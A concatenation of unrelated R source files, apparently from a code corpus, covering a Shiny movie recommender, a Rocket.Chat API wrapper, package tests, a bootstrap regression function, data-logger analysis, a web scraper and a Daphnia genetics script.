rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh12,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[12]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster12_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh13,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[13]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster13_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh_cluster,{
id_list = movie_cluster[,sample(1:50,1)]
id_list = rev(id_list)
output$cluster_might1 <- renderUI({
tags$img(src = movie_all[movie_all$id==id_list[1],'poster'])
})
observeEvent(input$cluster_select1,{
id = id_list[1]
output$cluster_might_info1 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
output$cluster_might2 <- renderUI({
tags$img(src = movie_all[movie_all$id==id_list[2],'poster'])
})
observeEvent(input$cluster_select2,{
id = id_list[2]
output$cluster_might_info2 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
# ---------------------------------------------------------------------------
# Recommendation slots 3-6 ("you might also like" panels).
# The original code repeated the identical renderUI/observeEvent pair for each
# slot, differing only in the slot index, so the shared logic is factored into
# two helpers and driven by a loop.
# NOTE(review): relies on `movie_all`, `id_list`, `input` and `output` from the
# enclosing server scope, exactly as the duplicated blocks did.
# ---------------------------------------------------------------------------

# Build the HTML detail panel (titles, rating, genres, director, actors) for
# the movie whose id is `id`, reading every field from `movie_all`.
make_cluster_movie_info <- function(id) {
  type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
  type = type[!is.na(type)]
  type = paste(type,collapse = "/")
  score = movie_all[movie_all$id==id, 'score']
  pop = movie_all[movie_all$id==id, 'pop']
  rate = paste(score," (",pop,"人评价)",sep = "")
  director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
  director = director[!is.na(director)]
  director = paste(director,collapse = "/")
  director = paste("导演:",director)
  actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
  actor = actor[!is.na(actor)]
  actor = paste(actor,collapse = "/")
  actor = paste("演员",actor)
  tags$div(
    h3(movie_all[movie_all$id==id, 'English_name']),
    h4(movie_all[movie_all$id==id, 'name']),
    h4(rate),
    h5(type),
    h6(director),
    h6(actor)
  )
}

# Wire up one slot: render its poster image, and (re)render its detail panel
# whenever the matching "cluster_select<slot>" input fires.
setup_cluster_slot <- function(slot) {
  force(slot)  # pin the loop value before the closures below capture it
  output[[paste0("cluster_might", slot)]] <- renderUI({
    tags$img(src = movie_all[movie_all$id==id_list[slot],'poster'])
  })
  observeEvent(input[[paste0("cluster_select", slot)]], {
    id = id_list[slot]
    output[[paste0("cluster_might_info", slot)]] <- renderUI({
      make_cluster_movie_info(id)
    })
  })
}

for (slot in 3:6) setup_cluster_slot(slot)
})
}
|
#' Channel Set Purpose
#'
#' Sets the description for the channel (the same as channels.setDescription, obsolete).
#'
#' @param tok The token object used to connect to the app; supplies the server
#'   URL (`tok$url`) plus the auth token and user id used in the request headers.
#' @param roomid The channel's id. Required.
#' @param purpose The description to set for the channel. Required.
#'
#' @return The parsed body of the API response.
#'
#' @export
#' @importFrom httr POST add_headers content stop_for_status
#' @importFrom jsonlite toJSON
channels_channel_set_purpose <- function(tok,
                                         roomid,
                                         purpose) {
  # Build the JSON payload, dropping any NULL entries before serialising.
  params <- list(
    roomid = roomid,
    purpose = purpose
  )
  params <- no_null(params)
  params <- toJSON(params, auto_unbox = TRUE)
  res <- httr::POST(
    add_headers(
      "Content-type" = "application/json",
      "X-Auth-Token" = tok$data$authToken,
      "X-User-Id" = tok$data$userId
    ),
    url = paste0(tok$url, "/api/v1/channels.setPurpose"),
    body = params
  )
  # Fail loudly on any HTTP error status before parsing the body.
  stop_for_status(res)
  content(res)
}
| /R/channels_channel_set_purpose.R | no_license | ColinFay/rrocketchat | R | false | false | 965 | r | #' Channel Set Purpose
#'
#' Sets the description for the channel (the same as channels.setDescription, obsolete).
#'
#' @param token The token to connect to the app.
#' @param roomid The channel’s id Required
#' @param purpose The description to set for the channel. Required
#'
#' @export
#' @importFrom httr POST GET add_headers content stop_for_status
#' @importFrom jsonlite toJSON
channels_channel_set_purpose <- function(tok,
roomid,
purpose) {
params <- list(
roomid = roomid,
purpose = purpose
)
params <- no_null(params)
params <- toJSON(params, auto_unbox = TRUE)
res <- httr::POST(
add_headers(
"Content-type" = "application/json",
"X-Auth-Token" = tok$data$authToken,
"X-User-Id" = tok$data$userId
),
url = paste0(tok$url, "/api/v1/channels.setPurpose"),
body = params
)
stop_for_status(res)
content(res)
}
|
# Regression test: build_readme() must create README.md inside the test
# package and must not leave a rendered README.html behind.
test_that("Package readme can be built ", {
  skip_on_cran()
  pkg <- "testReadme"
  generated <- c(file.path(pkg, "README.md"), file.path(pkg, "man/figures"))
  # Remove everything build_readme() generates once the test finishes.
  on.exit(unlink(generated, recursive = TRUE))
  suppressMessages(build_readme(pkg))
  expect_true(file.exists(file.path(pkg, "README.md")))
  expect_false(file.exists(file.path(pkg, "README.html")))
})
| /tests/testthat/test-build-readme.R | no_license | ricciardi/devtools | R | false | false | 336 | r | test_that("Package readme can be built ", {
skip_on_cran()
on.exit(unlink(c("testReadme/README.md", "testReadme/man/figures"), recursive = TRUE))
suppressMessages(build_readme("testReadme"))
expect_true(file.exists(file.path("testReadme", "README.md")))
expect_false(file.exists(file.path("testReadme", "README.html")))
})
|
# Auto-generated fuzz/valgrind regression input for DLMtool::LBSPRgen.
# The argument list below was produced by a test-case generator (note the
# extreme, denormal and NaN doubles); the values are intentionally
# nonsensical and exist only to exercise the compiled routine for crashes.
testlist <- list(Beta = 0, CVLinf = 86341236051411296, FM = 1.53632495265886e-311, L50 = 0, L95 = 0, LenBins = c(2.0975686864138e+162, -2.68131210337361e-144, -1.11215735981244e+199, -4.48649879577108e+143, 1.6611802228813e+218, 900371.947279558, 1.07063092954708e+238, 2.88003257377011e-142, 1.29554141202795e-89, -1.87294312860528e-75, 3.04319010211815e+31, 191.463561345044, 1.58785813294449e+217, 1.90326589719466e-118, -3.75494418025505e-296, -2.63346094087863e+200, -5.15510035957975e+44, 2.59028521047075e+149, 1.60517426337473e+72, 1.74851929178852e+35, 1.32201752290843e-186, -1.29599553894715e-227, 3.20314220604904e+207, 584155875718587, 1.71017833066717e-283, -3.96505607598107e+51, 5.04440990041945e-163, -5.09127626480085e+268, 2.88137633290038e+175, 6.22724404181897e-256, 4.94195713773372e-295, 5.80049493946414e+160, -5612008.23597089, -2.68347267272935e-262, 1.28861520348431e-305, -5.05455182157157e-136, 4.44386438170367e+50, -2.07294901774837e+254, -3.56325845332496e+62, -1.38575911145229e-262, -1.19026551334786e-217, -3.54406233509625e-43, -4.15938611724176e-209, -3.06799941292011e-106, 1.78044357763692e+244, -1.24657398993838e+190, 1.14089212334828e-90, 136766.715673668, -1.4733334572789e-67, -2.92763930406321e+21 ), LenMids = c(-1.121210344879e+131, -1.121210344879e+131, NaN), Linf = 2.81991272491703e-308, MK = -2.08633459786369e-239, Ml = c(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), Prob = structure(c(4.48157192325537e-103, 2.43305969276274e+59, 6.5730975202806e-96, 2.03987918888949e-104, 4.61871336464985e-39, 1.10811931066926e+139), .Dim = c(1L, 6L)), SL50 = 9.97941197291525e-316, SL95 = 2.12248160522076e-314, nage = 682962941L, nlen = 1623851345L, rLens = c(4.74956174024781e+199, -7.42049538387034e+278, -5.82966399158032e-71, -6.07988133887702e-34, 4.62037926128924e-295, -8.48833146280612e+43, 2.71954993859316e-126 ))
# Invoke the compiled LBSPR generator with the fuzzed arguments.
result <- do.call(DLMtool::LBSPRgen,testlist)
str(result) | /DLMtool/inst/testfiles/LBSPRgen/AFL_LBSPRgen/LBSPRgen_valgrind_files/1615832181-test.R | no_license | akhikolla/updatedatatype-list2 | R | false | false | 2,047 | r | testlist <- list(Beta = 0, CVLinf = 86341236051411296, FM = 1.53632495265886e-311, L50 = 0, L95 = 0, LenBins = c(2.0975686864138e+162, -2.68131210337361e-144, -1.11215735981244e+199, -4.48649879577108e+143, 1.6611802228813e+218, 900371.947279558, 1.07063092954708e+238, 2.88003257377011e-142, 1.29554141202795e-89, -1.87294312860528e-75, 3.04319010211815e+31, 191.463561345044, 1.58785813294449e+217, 1.90326589719466e-118, -3.75494418025505e-296, -2.63346094087863e+200, -5.15510035957975e+44, 2.59028521047075e+149, 1.60517426337473e+72, 1.74851929178852e+35, 1.32201752290843e-186, -1.29599553894715e-227, 3.20314220604904e+207, 584155875718587, 1.71017833066717e-283, -3.96505607598107e+51, 5.04440990041945e-163, -5.09127626480085e+268, 2.88137633290038e+175, 6.22724404181897e-256, 4.94195713773372e-295, 5.80049493946414e+160, -5612008.23597089, -2.68347267272935e-262, 1.28861520348431e-305, -5.05455182157157e-136, 4.44386438170367e+50, -2.07294901774837e+254, -3.56325845332496e+62, -1.38575911145229e-262, -1.19026551334786e-217, -3.54406233509625e-43, -4.15938611724176e-209, -3.06799941292011e-106, 1.78044357763692e+244, -1.24657398993838e+190, 1.14089212334828e-90, 136766.715673668, -1.4733334572789e-67, -2.92763930406321e+21 ), LenMids = c(-1.121210344879e+131, -1.121210344879e+131, NaN), Linf = 2.81991272491703e-308, MK = -2.08633459786369e-239, Ml = c(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), Prob = structure(c(4.48157192325537e-103, 2.43305969276274e+59, 6.5730975202806e-96, 2.03987918888949e-104, 4.61871336464985e-39, 1.10811931066926e+139), .Dim = c(1L, 6L)), SL50 = 9.97941197291525e-316, SL95 = 2.12248160522076e-314, nage = 682962941L, nlen = 1623851345L, rLens = c(4.74956174024781e+199, -7.42049538387034e+278, -5.82966399158032e-71, -6.07988133887702e-34, 4.62037926128924e-295, 
-8.48833146280612e+43, 2.71954993859316e-126 ))
result <- do.call(DLMtool::LBSPRgen,testlist)
str(result) |
# BCa bootstrap for the slope of a simple linear regression of y on x.
#
# Arguments:
#   x, y        - numeric vectors (predictor and response).
#   null.hyp    - optional null value for the slope; when supplied a bootstrap
#                 hypothesis test is performed as well.
#   alternative - "two.sided", "less" or "greater".
#   conf.level  - confidence level for the BCa interval.
#   type        - "two-sided", "lower-bound" or "upper-bound"; derived from
#                 `alternative` when NULL.
#   R           - number of case-resampling bootstrap replicates.
#
# Returns an object of class "boot.regcor".
# Requires the 'boot' package to be attached by the caller/package.
boot.slope.bca <-
function(x, y, null.hyp = NULL, alternative = c("two.sided","less","greater"),
         conf.level = 0.95, type = NULL, R = 9999)
{
# require(boot)
test <- !is.null(null.hyp)
data <- data.frame(x,y)
# Observed statistic: the fitted slope of y on x.
# (A dead `obs <- cor(x,y)` that was immediately overwritten here has been removed.)
obs <- lm(y~x)$coeff[2]
# Case resampling: refit the regression on each bootstrap sample.
boot.slope <- suppressWarnings(boot(data,function(d,i) lm(d$y[i]~d$x[i],data=d)$coeff[2],R=R))
z <- c(boot.slope$t)
z <- z[(!is.infinite(z) & !is.na(z))] # Drop resamples with a non-finite slope (e.g. zero-variance resamples).
R <- length(z) # To adjust for eliminated resamples.
bias <- signif(mean(z)-obs,digits=3)
percent.bias <- signif(100*abs(bias/obs),digits=3)
cl <- paste(100*conf.level,"%",sep="")
if (identical(alternative,c("two.sided","less","greater"))) alternative <- "two.sided"
# Bias-correction constant z0, from the fraction of resamples below obs.
z1 <- mean(z < obs)
z0 <- qnorm(z1)
n <- length(x)
d <- vector(length=n)
# Jackknife used for the acceleration constant a0.
# NOTE(review): the jackknife statistic here is the correlation, not the fitted
# slope, although the bootstrap statistic is the slope.  This looks like a
# carry-over from a correlation version of this function -- confirm whether it
# is intended before changing the numerics.
for (j in 1:n) d[j] <- suppressWarnings(cor(data$x[-j],data$y[-j]))
d <- d[(!is.infinite(d) & !is.na(d))]
mean.d <- mean(d)
a0 <- -sum((d-mean.d)^3)/(6*(sum((d-mean.d)^2))^(3/2))
# FOR THE HYPOTHESIS TEST
if (test)
{
 # Right-tail probability of the null value within the bootstrap distribution,
 # with a half-count correction for ties.
 rtp <- (sum((z < null.hyp))+(sum((z == null.hyp))+1)/2)/(R+1)
 b0 <- qnorm(rtp)
 c0 <- ((2+a0*b0-a0*z0)*z0-b0)/(1+a0*b0-a0*z0)
 p0 <- pnorm(c0); # P-value for a left-tailed test
 tc <- c("two.sided","less","greater")
 pc <- c(2*min(p0,1-p0),p0,1-p0)
 p <- signif(pc[tc==alternative],digits=3)
 pv <- c((p>=0.001)&(p<=0.999),(p<0.001),(p>0.999))
 pt <- c(p,"P < 0.001","P > 0.999")
 p.value <- pt[pv]
 ac <- c("not-equal","less-than","greater-than")
 alt <- ac[tc==alternative]
}
# FOR THE CONFIDENCE INTERVAL
tci <- c("two.sided","greater","less")
ti <- c("two-sided","lower-bound","upper-bound")
if (is.null(type)) type <- ti[tci==alternative]
a <- if (identical(type,"two-sided")) (1-conf.level)/2 else 1-conf.level
za <- qnorm(a,lower.tail=FALSE)
# BCa-adjusted quantile levels.
a1 <- pnorm(z0+(z0-za)/(1-a0*(z0-za)))
a2 <- pnorm(z0+(z0+za)/(1-a0*(z0+za)))
q <- signif(quantile(z,p=c(a1,a2)),digits=4)
li <- c(paste("(",q[1],", ",q[2],")",sep=""),paste(q[1],"(LCB)"),paste(q[2],"(UCB)"))
CI <- li[ti==type]
lims <- list(q,q[1],q[2])
llims <- lims[[c(1:3)[ti==type]]]
# FOR THE RESULTS
# Recover the names of the caller's variables for the printed report.
var1.name <- all.names(substitute(x))
if (length(var1.name)>1) var1.name <- var1.name[[3]]
var2.name <- all.names(substitute(y))
if (length(var2.name)>1) var2.name <- var2.name[[3]]
stat.name <- "slope"
if (!test) {alt <- NULL; p.value <- NULL; p <- NULL}
results <-
 list(Boot.values=z,Confidence.limits=llims,
      Header=paste("RESULTS OF BCa BOOTSTRAP FOR",toupper(stat.name)),
      Variable.1=var1.name,Variable.2=var2.name,n=length(x),
      Statistic=stat.name,Observed=obs,Replications=R,Mean=mean(z),
      SE=sd(z),Bias=bias,Percent.bias=percent.bias,Null=null.hyp,
      Alternative=alt,P.value=p.value,p.value=p,Level=cl,Type=type,
      Confidence.interval=CI,cor.ana=FALSE)
class(results) <- "boot.regcor" # bootstrap, regression and correlation
results
}
| /wBoot/R/boot.slope.bca.R | no_license | ingted/R-Examples | R | false | false | 2,964 | r | boot.slope.bca <-
function(x, y, null.hyp = NULL, alternative = c("two.sided","less","greater"),
conf.level = 0.95, type = NULL, R = 9999)
{
# require(boot)
obs <- cor(x,y)
test <- !is.null(null.hyp)
data <- data.frame(x,y)
obs <- lm(y~x)$coeff[2]
boot.slope <- suppressWarnings(boot(data,function(d,i) lm(d$y[i]~d$x[i],data=d)$coeff[2],R=R))
z <- c(boot.slope$t)
z <- z[(!is.infinite(z) & !is.na(z))] # To eliminate resamples with undefined correlation due to a 0 variance.
R <- length(z) # To adjust for eliminated resamples.
bias <- signif(mean(z)-obs,digits=3)
percent.bias <- signif(100*abs(bias/obs),digits=3)
cl <- paste(100*conf.level,"%",sep="")
if (identical(alternative,c("two.sided","less","greater"))) alternative <- "two.sided"
z1 <- mean(z < obs)
z0 <- qnorm(z1)
n <- length(x)
d <- vector(length=n)
for (j in 1:n) d[j] <- suppressWarnings(cor(data$x[-j],data$y[-j]))
d <- d[(!is.infinite(d) & !is.na(d))]
mean.d <- mean(d)
a0 <- -sum((d-mean.d)^3)/(6*(sum((d-mean.d)^2))^(3/2))
# FOR THE HYPOTHESIS TEST
if (test)
{
rtp <- (sum((z < null.hyp))+(sum((z == null.hyp))+1)/2)/(R+1)
b0 <- qnorm(rtp)
c0 <- ((2+a0*b0-a0*z0)*z0-b0)/(1+a0*b0-a0*z0)
p0 <- pnorm(c0); # P-value for a left-tailed test
tc <- c("two.sided","less","greater")
pc <- c(2*min(p0,1-p0),p0,1-p0)
p <- signif(pc[tc==alternative],digits=3)
pv <- c((p>=0.001)&(p<=0.999),(p<0.001),(p>0.999))
pt <- c(p,"P < 0.001","P > 0.999")
p.value <- pt[pv]
ac <- c("not-equal","less-than","greater-than")
alt <- ac[tc==alternative]
}
# FOR THE CONFIDENCE INTERVAL
tci <- c("two.sided","greater","less")
ti <- c("two-sided","lower-bound","upper-bound")
if (is.null(type)) type <- ti[tci==alternative]
a <- if (identical(type,"two-sided")) (1-conf.level)/2 else 1-conf.level
za <- qnorm(a,lower.tail=FALSE)
a1 <- pnorm(z0+(z0-za)/(1-a0*(z0-za)))
a2 <- pnorm(z0+(z0+za)/(1-a0*(z0+za)))
q <- signif(quantile(z,p=c(a1,a2)),digits=4)
li <- c(paste("(",q[1],", ",q[2],")",sep=""),paste(q[1],"(LCB)"),paste(q[2],"(UCB)"))
CI <- li[ti==type]
lims <- list(q,q[1],q[2])
llims <- lims[[c(1:3)[ti==type]]]
# FOR THE RESULTS
var1.name <- all.names(substitute(x))
if (length(var1.name)>1) var1.name <- var1.name[[3]]
var2.name <- all.names(substitute(y))
if (length(var2.name)>1) var2.name <- var2.name[[3]]
stat.name <- "slope"
if (!test) {alt <- NULL; p.value <- NULL; p <- NULL}
results <-
list(Boot.values=z,Confidence.limits=llims,
Header=paste("RESULTS OF BCa BOOTSTRAP FOR",toupper(stat.name)),
Variable.1=var1.name,Variable.2=var2.name,n=length(x),
Statistic=stat.name,Observed=obs,Replications=R,Mean=mean(z),
SE=sd(z),Bias=bias,Percent.bias=percent.bias,Null=null.hyp,
Alternative=alt,P.value=p.value,p.value=p,Level=cl,Type=type,
Confidence.interval=CI,cor.ana=FALSE)
class(results) <- "boot.regcor" # bootstrap, regression and correlation
results
}
|
#--------- Read from CSV File (Remember reverse slashes) -----------
LoggerResults = read.csv("C:/Data Repositry/Elspec/TestResults/TEST140/PQSExport_20150216_095845_Ne02b_Wave.csv", header=T)
LoggerResults$TIMESTAMP <- dmy_hm(LoggerResults$X.DATEANDTIME) + as.numeric(LoggerResults$X.SECONDS.)
#--------- Set Window timeframe-------
message(min(LoggerResults$TIMESTAMP))
message(max(LoggerResults$TIMESTAMP))
#--------Insert min and max times here and refine manually to locate fault -------------
StartTime <- as.POSIXct("2015-02-16 09:59:04", format = "%Y-%m-%d %H:%M:%OS", tz = "UTC")
EndTime <- as.POSIXct("2015-02-16 09:59:21.1", format = "%Y-%m-%d %H:%M:%OS", tz = "UTC")
FilteredResults <- subset(LoggerResults, LoggerResults$TIMESTAMP >= StartTime & LoggerResults$TIMESTAMP <= EndTime)
#--------- Set up plotter to view 3 graphs and graph currents -----
plot.new()
frame()
par(mfrow=c(3,1))
plot(FilteredResults$TIMESTAMP,FilteredResults$X.WAVEFORMI1.)
plot(FilteredResults$TIMESTAMP,FilteredResults$X.WAVEFORMI2.)
plot(FilteredResults$TIMESTAMP,FilteredResults$X.WAVEFORMI3.)
#---------- Mark window length as a test and write back to new csv file ----
LoggerResults$Testing <- ifelse(LoggerResults$TIMESTAMP >= StartTime, ifelse(LoggerResults$TIMESTAMP <= EndTime, 1,0),0)
write.csv(LoggerResults, file= "C:/Data Repositry/Elspec/TestResults/Test140Results.csv") | /TEST226.R | no_license | acousland/Elspec_Sample_Analysis | R | false | false | 1,384 | r |
#--------- Read from CSV File (Remember reverse slashes) -----------
LoggerResults = read.csv("C:/Data Repositry/Elspec/TestResults/TEST140/PQSExport_20150216_095845_Ne02b_Wave.csv", header=T)
LoggerResults$TIMESTAMP <- dmy_hm(LoggerResults$X.DATEANDTIME) + as.numeric(LoggerResults$X.SECONDS.)
#--------- Set Window timeframe-------
message(min(LoggerResults$TIMESTAMP))
message(max(LoggerResults$TIMESTAMP))
#--------Insert min and max times here and refine manually to locate fault -------------
StartTime <- as.POSIXct("2015-02-16 09:59:04", format = "%Y-%m-%d %H:%M:%OS", tz = "UTC")
EndTime <- as.POSIXct("2015-02-16 09:59:21.1", format = "%Y-%m-%d %H:%M:%OS", tz = "UTC")
FilteredResults <- subset(LoggerResults, LoggerResults$TIMESTAMP >= StartTime & LoggerResults$TIMESTAMP <= EndTime)
#--------- Set up plotter to view 3 graphs and graph currents -----
plot.new()
frame()
par(mfrow=c(3,1))
plot(FilteredResults$TIMESTAMP,FilteredResults$X.WAVEFORMI1.)
plot(FilteredResults$TIMESTAMP,FilteredResults$X.WAVEFORMI2.)
plot(FilteredResults$TIMESTAMP,FilteredResults$X.WAVEFORMI3.)
#---------- Mark window length as a test and write back to new csv file ----
LoggerResults$Testing <- ifelse(LoggerResults$TIMESTAMP >= StartTime, ifelse(LoggerResults$TIMESTAMP <= EndTime, 1,0),0)
write.csv(LoggerResults, file= "C:/Data Repositry/Elspec/TestResults/Test140Results.csv") |
# Scrape Rotten Tomatoes' "Top 100 Animation Movies" chart: grab every title
# and its Tomatometer score, then bundle them into one data frame.
library(robotstxt)
library(rvest)
library(dplyr)

link <- "https://www.rottentomatoes.com/top/bestofrt/top_100_animation_movies/"

# Consult robots.txt first; TRUE means fetching this page is permitted.
path <- paths_allowed(link)

# Download and parse the chart page once, then pull both columns out of it.
web <- read_html(link)
movie_name <- web %>% html_nodes("#top_movies_main .articleLink") %>% html_text()
movie_rating <- web %>% html_nodes("#top_movies_main .tMeterScore") %>% html_text()

# Inspect the scraped vectors, then combine them into the final table.
View(movie_rating)
View(movie_name)
movie_IMDB <- data.frame(movie_rating, movie_name)
View(movie_IMDB)
| /RA1811003020259 (1).R | no_license | Nasirsohail/Nasirsohail | R | false | false | 508 | r | library(robotstxt)
path<-paths_allowed("https://www.rottentomatoes.com/top/bestofrt/top_100_animation_movies/")
library(rvest)
link<-"https://www.rottentomatoes.com/top/bestofrt/top_100_animation_movies/"
web<-read_html(link)
library(dplyr)
movie_name<-web%>%html_nodes("#top_movies_main .articleLink")%>%html_text()
movie_rating<-web%>%html_nodes("#top_movies_main .tMeterScore")%>%html_text()
View(movie_rating)
View(movie_name)
movie_IMDB<-data.frame(movie_rating,movie_name)
View(movie_IMDB)
|
#module load intel/18.0 intelmpi/18.0 R/3.6.3; R
### makes rabbit input
# Builds the RABBIT phasing input for one chromosome.  Command-line args:
#   1) chromosome name, 2) map length in cM, 3) which set of F1 clones to use.
args = commandArgs(trailingOnly=TRUE)
chr.i <- as.character(args[1])
maxcM <- as.numeric(args[2])
f1s.set <- as.character(args[3])
#chr.i <- "Scaffold_1863_HRSCAF_2081"; maxcM=10; f1s.set <- "all"
### libraries
library(data.table)
library(SeqArray)
library(foreach)
### set wd
setwd("/project/berglandlab/Karen/MappingDec2019/WithPulicaria/June2020")
### load SuperClone
sc <- fread("Superclones201617182019withObtusaandPulicaria_kingcorr_20200623_wmedrd.txt")
### which F1s?
#f1s <- fread("/scratch/aob2x/daphnia_hwe_sims/DaphniaPulex20162017Sequencing/AlanAnalysis/rQTL/F1s_to_use.onlyPheno.delim")
#f1s <- fread("/scratch/aob2x/daphnia_hwe_sims/DaphniaPulex20162017Sequencing/AlanAnalysis/rQTL/F1s_to_use.allF1s.delim")
#f1s <- fread("/scratch/aob2x/daphnia_hwe_sims/DaphniaPulex20162017Sequencing/AlanAnalysis/rQTL/F1s_to_use.all_AxC_F1s.delim")
# Pick the clone set from the superclone table based on the requested group:
# AxC hybrids with/without phenotype data, selfed C clones, or all of them.
if(f1s.set=="onlyPheno_AxC") {
  f1s <- sc[AxCF1Hybrid==1][OneLiterPheno==1]$clone
} else if (f1s.set=="wildF1s_AxC"){
  f1s <- sc[AxCF1Hybrid==1][OneLiterPheno==0]$clone
} else if(f1s.set=="all_AxC") {
  f1s <- sc[AxCF1Hybrid==1]$clone
} else if(f1s.set=="all_CxC") {
  f1s <- sc[OneLiterPheno==1][AxCF1Hybrid==0][SC=="selfedC"]$clone
} else if(f1s.set=="all") {
  f1s <- c(sc[AxCF1Hybrid==1]$clone,
          sc[OneLiterPheno==1][AxCF1Hybrid==0][SC=="selfedC"]$clone)
}
f1s <- data.table(clone=f1s)
### open GDS
genofile <- seqOpen("/project/berglandlab/Karen/MappingDec2019/WithPulicaria/June2020/MapJune2020_ann.seq.gds", allow.duplicate=TRUE)
### load in filter file
snpFilter <- fread("snpsvarpulexpresentinhalf_table_20200623")
### make snp.dt
# One row per variant in the GDS; then intersect with the SNP filter table.
snp.dt <- data.table(chr=seqGetData(genofile, "chromosome"),
                      pos=seqGetData(genofile, "position"),
                      id=seqGetData(genofile, "variant.id"),
                      numAlleles=seqNumAllele(genofile),
                      key="chr")
setkey(snpFilter, chr, pos)
setkey(snp.dt, chr, pos)
snp.dt <- merge(snpFilter, snp.dt)
### make majority rule (consensus) genotype calls for
# Per-parent (superclones "A" and "C") allele frequency at every retained SNP.
ac.fd <- foreach(sc.i=c("A", "C"), .combine="cbind")%do%{
  seqResetFilter(genofile)
  seqSetFilter(genofile, sample.id=sc[SC==sc.i]$clone, variant.id=snp.dt$id)
  data.table(af=seqAlleleFreq(genofile, ref.allele=1L)) ### alternate allele
}
setnames(ac.fd, c(1,2), c("af.A", "af.C"))
ac.fd <- cbind(ac.fd, snp.dt)
# Snap each parent's frequency to the nearest hard genotype (0 -> "11",
# 0.5 -> "12", 1 -> "22") and record how far the frequency was from that call.
ac.fd[!is.na(af.A),A.geno := unlist(sapply(ac.fd[!is.na(af.A)]$af.A, function(x) c("11","12","22")[which.min(abs(x-c(0,.5,1)))]))]
ac.fd[!is.na(af.C),C.geno := unlist(sapply(ac.fd[!is.na(af.C)]$af.C, function(x) c("11","12","22")[which.min(abs(x-c(0,.5,1)))]))]
ac.fd[!is.na(af.A),A.delta := unlist(sapply(ac.fd[!is.na(af.A)]$af.A, function(x) min(abs(x-c(0,.5,1)))))]
ac.fd[!is.na(af.C),C.delta := unlist(sapply(ac.fd[!is.na(af.C)]$af.C, function(x) min(abs(x-c(0,.5,1)))))]
# Keep only confidently-called sites in both parents.
ac.fd <- ac.fd[A.delta < 0.05 & C.delta < 0.05]
# Keep sites that are informative for phasing (at least one parent het, or
# the parents fixed for opposite alleles).
ac.inform <- ac.fd[(A.geno=="12" & C.geno=="11") |
          (A.geno=="12" & C.geno=="22") |
          (A.geno=="11" & C.geno=="12") |
          (A.geno=="22" & C.geno=="12") |
          (A.geno=="12" & C.geno=="12") |
          (A.geno=="11" & C.geno=="22") |
          (A.geno=="22" & C.geno=="11") ]
# Restrict to the requested chromosome and bin positions into 100 kb windows.
ac.inform <- ac.inform[chr==chr.i]
ac.inform[,pos.bin:=round(pos/1e5)]
### select sites in F1s with lowest amount of missing data
